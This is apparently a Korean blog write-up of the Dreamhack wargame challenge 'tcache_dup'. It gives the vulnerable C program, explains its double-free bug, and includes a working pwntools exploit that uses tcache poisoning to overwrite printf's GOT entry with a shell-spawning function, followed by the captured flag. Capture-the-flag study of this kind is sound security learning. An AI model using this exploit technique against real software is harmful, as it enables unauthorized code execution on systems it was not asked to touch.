

Canary와 NX 보호 기법이 걸려 있다.
Partial RELRO -> GOT overwrite로 풀 수 있을지도?

// gcc -o tcache_dup tcache_dup.c -no-pie
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>
char *ptr[10];
void alarm_handler() {
    exit(-1);
}
void initialize() {
    setvbuf(stdin, NULL, _IONBF, 0);
    setvbuf(stdout, NULL, _IONBF, 0);
    signal(SIGALRM, alarm_handler);
    alarm(60);
}
int create(int cnt) {
    int size;
    if (cnt > 10) {
        return -1;
    }
    printf("Size: ");
    scanf("%d", &size);
    ptr[cnt] = malloc(size);
    if (!ptr[cnt]) {
        return -1;
    }
    printf("Data: ");
    read(0, ptr[cnt], size);
}
int delete() {
    int idx;
    printf("idx: ");
    scanf("%d", &idx);
    if (idx > 10) {
        return -1;
    }
    free(ptr[idx]);
}
void get_shell() {
    system("/bin/sh");
}
int main() {
    int idx;
    int cnt = 0;
    initialize();
    while (1) {
        printf("1. Create\n");
        printf("2. Delete\n");
        printf("> ");
        scanf("%d", &idx);
        switch (idx) {
            case 1:
                create(cnt);
                cnt++;
                break;
            case 2:
                delete();
                break;
            default:
                break;
        }
    }
    return 0;
}
case1:
원하는 청크의 크기만큼 메모리를 할당하고 데이터를 저장
주소는 포인터 배열에 저장
case2:
포인터 배열 중 인덱스를 지정해 원하는 공간을 해제
하지만 청크를 free하고 초기화하지 않아서 Double Free Bug 발생
인덱스가 10 이상이면 free 안 함
청크 값을 수정할 수 있는 함수가 없음 -> Double Free Bug 보호 기법 우회 불가
그러나 DFB 보호 기법은 걸려 있지 않았다.

32~1040 바이트만큼 메모리를 할당 -> 2번 연속 free -> tcache duplication 발생
같은 크기로 메모리 할당 -> overwrite addr 입력 -> tcache poisoning 발생 -> tcache entry에 overwrite addr 추가됨
같은 크기 메모리 2번 할당 -> 2번째 메모리를 할당할 때 get_shell addr 입력 -> overwrite addr에 get_shell addr 저장
tcache dup 취약점을 이용해 print GOT를 get_shell addr로 overwrite한다.
다음 루프 실행 시에 printf() 대신에 get_shell()이 실행된다.
from pwn import *
import warnings
warnings.filterwarnings( 'ignore' )
p=remote('host3.dreamhack.games',21886)
e = ELF("./tcache_dup")
libc = ELF("./libc-2.27.so")
def create(size, data):
    p.sendlineafter("> ", "1")
    p.sendlineafter("Size: ", str(size))
    p.sendlineafter("Data: ", data)
def delete(idx):
    p.sendlineafter("> ", "2")
    p.sendlineafter("idx: ", str(idx))
# Double Free
create(64, "dreamhack")
delete(0)
delete(0)
# Overwrite next pointer -> printf's got -> get_shell
create(64, p64(e.got["printf"]))
create(64, "D"*8)
create(64, p64(e.symbols["get_shell"])) 
p.interactive()

DH{8fb591cfc1a2e30d0a33d53ace8e4973d40c28a4eb8d6e20581a2e8bdd393a91}
'Wargame > Dreamhack' 카테고리의 다른 글
| [Dreamhack] cmd_center (0) | 2023.11.25 | 
|---|---|
| [Dreamhack] sint (0) | 2023.11.25 | 
| [Dreamhack] uaf_overwrite (0) | 2023.11.11 | 
| [Dreamhack] basic_exploitation_002 (0) | 2023.11.11 | 
| [Dreamhack] Return to library (0) | 2023.09.24 | 
 
									
								 
									
								 
									
								